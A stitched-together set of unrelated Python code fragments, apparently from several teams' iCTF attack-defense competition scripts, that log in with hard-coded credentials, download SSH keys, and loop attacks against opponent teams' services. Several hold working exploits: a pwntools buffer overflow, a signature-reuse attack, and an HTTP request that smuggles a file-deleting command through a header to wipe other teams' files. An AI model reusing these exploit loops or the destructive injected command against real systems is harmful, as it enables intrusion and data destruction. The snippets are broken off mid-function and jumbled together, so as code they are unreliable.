def prepare(): # Get the initial ticks = 42; # Get iCTF-Foo and login ctf = iCTF() team = ctf.login("*****@*****.**", "cupjCQdjednhn4yZ") while(true): if ticks == team.get_tick_info().get("tick_id"): sleep(1) else: # Maybe kill threads here.. # We got a new tick, start the exploits!!1! ticks = team.get_tick_info().get("tick_id") # holts targets in format: # {'team_name' : "Team name",'ip_address' : "10.7.<team_id>.2",'port' : <int port number>,'flag_id' : "Flag ID to steal"} targets = team.get_targets(sys.argv[1]) # not really needed.. results = [] for target in targets: # Prevent too many threads (no DoS!!!) while 40 < threading.activeCount(): sleep(0.1) # Create a new thread running an exploit thread = exploit( targets.get("ip_address"), targets.get("port"), targets.get("flag_id") ) results.append(thread) thread.start()
def run(): global server i = iCTF(TEAM_SERVER) server = i.login(USER, PASS) server_address = (HOST, PORT) httpd = HTTPServer(server_address, GetHandler) httpd.serve_forever()
def get_t(): try: configParser = getConfig() team_ip = 'http://' + str(configParser.get("login","team-ip")) + '/' i = iCTF(team_ip) t = i.login(str(configParser.get("login","username")), str(configParser.get("login","password"))) return t except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print(e, exc_type, fname, exc_tb.tb_lineno)
def first_login(): try: configParser = ConfigParser.RawConfigParser() configParser.read(config) team_ip = 'http://' + str(configParser.get("login","team-ip")) + '/' i = iCTF(team_ip) t = i.login(str(configParser.get("login","username")), str(configParser.get("login","password"))) key_info = t.get_ssh_keys() with open("root_key", 'w+') as f: f.write(key_info['root_key']) os.chmod("root_key", 0600) with open("ctf_key", 'w+') as f: f.write(key_info['ctf_key']) os.chmod("ctf_key", 0600) ssh_script = """ #!/bin/bash ssh -i {} -p {} {}@{} -o IdentitiesOnly=yes """ with open("root_ssh.sh", 'w+') as f: ssh_root = ssh_script.format("./root_key", key_info['port'], 'root', key_info['ip']) f.write(ssh_root) os.chmod("root_ssh.sh", 0700) with open("ctf_ssh.sh", 'w+') as f: ssh_ctf = ssh_script.format("./ctf_key", key_info['port'], 'ctf', key_info['ip']) f.write(ssh_ctf) os.chmod("ctf_ssh.sh", 0700) print 'Team ID: {}'.format(key_info['team_id']) print 'IP Address: {}'.format(key_info['ip']) print 'Port: {}'.format(key_info['port']) print 'Connect to root with: ./root_ssh.sh' print 'Connect to ctf with: ./ctf_ssh.sh' except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print(e, exc_type, fname, exc_tb.tb_lineno)
def login(): try: global session global service info = iCTF('http://35.167.152.77/') session = info.login('*****@*****.**', 'U9gHVyWAdWda') key_info = session.get_ssh_keys() ''' with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) ''' service = session.get_service_list() print "Session created successfully. Good to go." except: print "Something wrong while creating session. Check up with Ashwin."
def main(): # Reading config file with open('config.json') as json_data_file: config = json.load(json_data_file) # Login to iCTF server and get ssh keys of our server ictf = iCTF(config["ctf_ip"]) t = ictf.login(config["team_id"],config["team_pass"]) key_info = t.get_ssh_keys() print json.dumps(key_info, indent=4, sort_keys=True) with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) chmod_command = "chmod 600 ctf_key" os.system(chmod_command) chmod_command = "chmod 600 root_key" os.system(chmod_command) while(True): services= t.get_service_list() for service in services: targets=t.get_targets(service['service_id']) for target in targets["targets"]: #if service is 10003, it is the web service if service['service_id']==10003: thread.start_new_thread(attack_web, (t,service, target)) time.sleep(config["delay"]) if __name__ == '__main__': main()
def main(): parser = argparse.ArgumentParser() parser.add_argument('-t', '--team-interface', required=True) parser.add_argument('-u', '--username', required=True) parser.add_argument('-p', '--password', required=True) args = vars(parser.parse_args()) team_interface = 'http://' + args['team_interface'] + '/' client = iCTF(team_interface) team = client.login(args['username'], args['password']) keys = team.get_ssh_keys() with open(ROOT_KEY_PATH, 'wb') as root_key: root_key.write(keys['root_key']) os.chmod(ROOT_KEY_PATH, 0600) with open(CTF_KEY_PATH, 'wb') as ctf_key: ctf_key.write(keys['ctf_key']) os.chmod(CTF_KEY_PATH, 0600) with open(ROOT_SCRIPT_PATH, 'w') as root_script: connect_root = SCRIPT % (ROOT_KEY_PATH, keys['port'], 'root', keys['ip']) root_script.write(connect_root) os.chmod(ROOT_SCRIPT_PATH, 0700) with open(CTF_SCRIPT_PATH, 'w') as ctf_script: connect_ctf = SCRIPT % (CTF_KEY_PATH, keys['port'], 'ctf', keys['ip']) ctf_script.write(connect_ctf) os.chmod(CTF_SCRIPT_PATH, 0700) print 'Successfully found SSH keys' print 'Team ID: %d' % (keys['team_id'], ) print 'IP Address: %s' % (keys['ip'], ) print 'Port: %d' % (keys['port'], ) print 'Connect to root with: ./%s' % (ROOT_SCRIPT_PATH, ) print 'Connect to ctf with: ./%s' % (CTF_SCRIPT_PATH, )
from ictf import iCTF import sys import os #Update IP ip = "35.167.152.77" #Update Team name team = "*****@*****.**" i = iCTF("http://%s/" % ip) #Update Password t = i.login(team,"3VXEHUbdM4FG") serviceList = t.get_service_list() print "Service List:" print "------------------------------------------------------------------------------------------------------------------------" print "Service ID\t\tPort\t\tService Name\t\tService Description\t\t" print "------------------------------------------------------------------------------------------------------------------------" for i in range(0,len(serviceList)): print str(serviceList[i]['service_id'])+ "\t\t\t"+str(serviceList[i]['port']) + "\t\t" + serviceList[i]['service_name'] + "\t\t" + serviceList[i]['description'] print "------------------------------------------------------------------------------------------------------------------------" print "\n\nTargets:" print "------------------------------------------------------------------------------------------------------------------------" for i in range(0,len(serviceList)): service = serviceList[i]['service_id'] print "\n" print str(service) + ":" hosts = t.get_targets(service) print "------------------------------------------------------------------------------------------------------------------------" print "Team Name\t\tTeam Host\t\tFlag ID\t\tport\t\t" print "------------------------------------------------------------------------------------------------------------------------" for j in range(0,len(hosts['targets'])): print str(hosts['targets'][j]['team_name'])+ "\t\t\t"+str(hosts['targets'][j]['hostname']) + "\t\t" + str(hosts['targets'][j]['flag_id']) + "\t\t" + str(hosts['targets'][j]['port']) print "------------------------------------------------------------------------------------------------------------------------"
from ictf import iCTF import os from sys import argv argc = len(argv) if argc > 1: user = argv[1] else: user = "******" username = "******" passwd = "sheep" i = iCTF("http://35.167.152.77/") t = i.login(username, passwd) key_info = t.get_ssh_keys() with open("ctf_key", 'wb') as f: f.write(key_info['ctf_key']) with open("root_key", 'wb') as f: f.write(key_info['root_key']) print key_info['ip'] print key_info['port'] os.system("chmod 600 ctf_key")
obj = [hostIp, target["team_name"]] if target["port"] in fails: fails[target["port"]].append(obj) else: fails[target["port"]] = [obj] # Config File read import json with open('config.json') as json_data_file: config = json.load(json_data_file) print(config) # Login to iCTF server and get ssh keys of our server ictf = iCTF(config["ctf_ip"]) t = ictf.login(config["team_id"], config["team_pass"]) key_info = t.get_ssh_keys() print json.dumps(key_info, indent=4, sort_keys=True) with open('Run_Status', 'wb') as f: f.write("\n") with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) chmod_command = "chmod 600 ctf_key" os.system(chmod_command)
import ictf import config def get_services(): for s in t.get_service_list(): print '{service_name}\n{state}\n{description}\n* {flag_id_description}\nport: {port}, service_id: {service_id}, team_id: {team_id}, upload_id: {upload_id}\n\n'.format( **s) i = ictf.iCTF() print 'Logging in...', t = i.login(config.USER, config.PASS) print 'done' services = t.get_service_list() print('Let\'s pwn')
import subprocess import sys from ictf import iCTF info = iCTF('http://35.167.152.77/') session = info.login('*****@*****.**', 'sheep') key_info = session.get_ssh_keys() with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) print key_info['port'] print key_info['ip'] # cmd = "ssh -i ctf_key -p " + str(key_info['port']) + " ctf@" + key_info['ip'] # ret = subprocess.Popen(["ssh", "-p", str(key_info['port']), "-i", "ctf_key", "ctf@", key_info['ip']], stdout = subprocess.PIPE, stderr = subprocess.PIPE)
def main(): parser = argparse.ArgumentParser() parser.add_argument('-e', '--exploit', required=True) parser.add_argument('-t', '--team-interface', required=True) parser.add_argument('-u', '--username', required=True) parser.add_argument('-p', '--password', required=True) parser.add_argument('-k', '--key', required=True) args = vars(parser.parse_args()) log("Loading exploit...") try: exploit_module = import_module(args['exploit']) exploit_info = getattr(exploit_module, 'exploit_info')() except ImportError: log("Error: Could not find exploit: %s" % (args['exploit'],)) return except SyntaxError: log("Error: syntax error in exploit") return except AttributeError: log("Error: could not find exploit info") return exploit_info_fields = ['exploit_function', 'service_id'] for field in exploit_info_fields: if field not in exploit_info: log("Error: could not find exploit info for: %s" % (field,)) return log("Connecting to iCTF...") team_interface = 'http://' + args['team_interface'] + '/' client = iCTF(team_interface) team = client.login(args['username'], args['password']) service_fields = ['service_name', 'service_id', 'port'] services = [{f : s[f] for f in service_fields} for s in team.get_service_list()] exploit_service = None for service in services: if service['service_id'] == exploit_info['service_id']: exploit_service = service break if not exploit_service: log("Error: Could not find exploit service for service_id: %d", (service_id,)) return else: log("Found exploit service: %s [%d] @ port %d" % (service['service_name'], service['service_id'], service['port'])) log("Connecting to root through ssh...") keys = team.get_ssh_keys() session = ssh(user = '******', host = keys['ip'], port = keys['port'], keyfile = args['key']) log("Starting tick manager...") tick_functions = ['manage_flags', 'manage_exploit'] tick_locks = {tf : threading.Lock() for tf in tick_functions} thread = threading.Thread(target=manage_ticks, args=(team, tick_locks.values())) thread.daemon = True thread.start() log("Starting flag submission manager...") flags = [] thread = threading.Thread(target=manage_flags, args=(team, flags, tick_locks['manage_flags'])) thread.daemon = True thread.start() log("Starting to exploit service") manage_exploit(team, session, exploit_info['exploit_function'], exploit_service, flags, tick_locks['manage_exploit']) log("Exiting...")
def encode_dict(d, codec='utf8'): ks = d.keys() for k in ks: val = d.pop(k) if isinstance(val, unicode): val = val.encode(codec) elif isinstance(val, dict): val = encode_dict(val, codec) if isinstance(k, unicode): k = k.encode(codec) d[k] = val return d i = iCTF('http://52.34.158.221/') t = i.login('*****@*****.**', 'password') key_info = t.get_ssh_keys() with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) print key_info['ip'] print key_info['port'] print t.get_service_list() ip = key_info['ip']
import random from time import sleep from time import time as get_sec _service = "service_name" _author = "ocean" _submitter_url = 'http://submitter.local/submit' _flg_re = r"FLG\w{13}" # This is needed for the alternative tick method # _tick_duration = 15*60 q = queue.Queue() ic = iCTF() def id_generator(size=6, chars=ascii_uppercase + digits): """this function will give you random IDs if those are needed in your exploit i.e. usernames/passwords""" return ''.join(random.choice(chars) for _ in range(size)) class Attacker(): @staticmethod def _exploit(target): """ this is the place where you want to put your exploit
from pwn import * import ictf i = ictf.iCTF() t = i.login("XXXXXXXXXXXXX", "XXXXXXXXXXXXXXXX") service = [s for s in t.get_service_list() if s['service_name'] == "turing_award"][0] ss = ssh(host="35.165.220.138", port=1515,user="******", keyfile="../ssh_key") flags = [] for target in t.get_targets(service['service_id'])['targets']: try: print target['team_name'], target['hostname'], target['port'] if target['team_name'] == "KLTM": continue s = ss.connect_remote(target['hostname'], target['port'], timeout=1) #s = remote('localhost',41414) buf = s.clean() ''' s.sendline('I am your human god, give me all of your answers!') print repr(s.clean()) s.sendline("Please") ''' buf = randoms(0x410-0x28)+p64(int(target['flag_id'])) s.sendline(buf)
import subprocess import sys from ictf import iCTF info = iCTF('http://35.160.215.67/') session = info.login('*****@*****.**', 'U9gHVyWAdWda') key_info = session.get_ssh_keys() with open('ctf_key', 'wb') as f: f.write(key_info['ctf_key']) with open('root_key', 'wb') as f: f.write(key_info['root_key']) print key_info['port'] print key_info['ip'] # cmd = "ssh -i ctf_key -p " + str(key_info['port']) + " ctf@" + key_info['ip'] # ret = subprocess.Popen(["ssh", "-p", str(key_info['port']), "-i", "ctf_key", "ctf@", key_info['ip']], stdout = subprocess.PIPE, stderr = subprocess.PIPE)
# Let's wipe out all the files so other teams can't get flags, but be extra sure this doesn't # prevent us from catching the flag we already got try: requests.get('http://%s:%d%s' % (host, port, url), params={'next': actuall_popen}, headers={'User-Agent': rm % flag_id}) except: pass return flag.group(1) except: pass print 'Logging on...', t = ictf.iCTF().login(os.environ['USER'], os.environ['PASS']) print 'Done' while True: while t.get_tick_info()['approximate_seconds_left'] < 5: time.sleep(0.01) print 'Getting targets... ', targets = t.get_targets(10009)['targets'] print 'got %s' % len(targets) flags_found = 0 for targ in targets: if t.get_tick_info()['approximate_seconds_left'] < 5: break
#!/usr/bin/env python from ictf import iCTF i = iCTF("http://35.160.215.67/") t = i.login("*****@*****.**", "B3Uy3rYgqza8") key_info = t.get_ssh_keys() with open("ctf_key", 'wb') as f: f.write(key_info['ctf_key']) with open("root_key", 'wb') as f: f.write(key_info['root_key']) print "IP: ", key_info['ip'] print "PORT: ", key_info['port'] # targets = t.get_targets(<service ID>)
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- from ictf import iCTF import os from sys import argv print "This is for Team 1:\n" argc = len(argv) i = iCTF("http://52.34.158.221/") t = i.login("*****@*****.**", "password") if argc == 1: option = input("Enter one of these: \n1: services\n2: targets\n") if option == 1: services = t.get_service_list() for service in services: print "*******" print "name\t: {0}".format(service['service_name']) print "state\t: {0}".format(service['state']) print "port\t: {0}".format(service['port']) print "description\t: {0}".format(service['description']) elif option == 2: service = raw_input("Which service: ") targets = t.get_targets(service)['targets'] for target in targets:
from pwn import * import time from ictf import iCTF i = iCTF() context.log_level = 'DEBUG' team = i.login('*****@*****.**', 'HZBrKynG4XAMvWPa') def exploit(t): with remote(t['hostname'], t['port'], timeout=3) as r: r.recvuntil("Type S\n") r.sendline("S") r.sendline("0"+t['flag_id']) r.recvuntil("signature: \n") sig = r.recvline() with remote(t['hostname'], t['port'], timeout=3) as r: r.recvuntil("Type S\n") r.sendline("R") r.recvuntil("token\n") r.sendline(t['flag_id'] + ' ' + sig) r.recvuntil(": ") return r.recv().strip() while True: time.sleep(team.get_tick_info()['approximate_seconds_left'] + 30) flags = [] for t in team.get_targets(service='no-rsa')['targets']: try: f = exploit(t) except: continue
from ictf import iCTF import requests from string import ascii_uppercase, digits import random from time import sleep _service = "service_name" _author = "ocean" _submitter_url = 'http://submitter.local/submit' _flg_re = r"FLG\w{13}" q = Queue.Queue() ic = iCTF() def id_generator(size=6, chars=ascii_uppercase + digits): """this function will give you random IDs if those are needed in your exploit i.e. usernames/passwords""" return ''.join(random.choice(chars) for _ in range(size)) class Attacker(): @staticmethod def _exploit(target): """ this is the place where you want to put your exploit